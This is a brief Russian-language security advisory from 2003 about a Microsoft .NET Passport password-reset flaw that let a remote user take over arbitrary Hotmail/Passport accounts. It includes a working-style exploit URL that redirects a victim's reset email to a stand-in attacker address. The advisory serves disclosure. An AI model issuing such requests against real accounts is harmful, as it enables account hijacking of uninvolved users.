Изменение паролей пользователей Microsoft .NET Passport

Дата публикации:12.05.2003
Всего просмотров:2338
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft .NET Passport, которая также воздействует на учетные записи Hotmail. Удаленный пользователь может изменить пароль произвольного пользователя и получить доступ к целевой учетной записи пользователя.

Сообщается, что удаленный пользователь может использовать форму сброса пароля .NET Passport, чтобы изменить пароль произвольного пользователя. Пример:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1
Удаленный пользователь (attacker@attacker.com) получит почтовое сообщение от .NET Passport сервера, в котором содержится URL для изменения пароля. Форма не требует ввода предыдущего пароля.
Ссылки: Hotmail & Passport (.NET Accounts) Vulnerability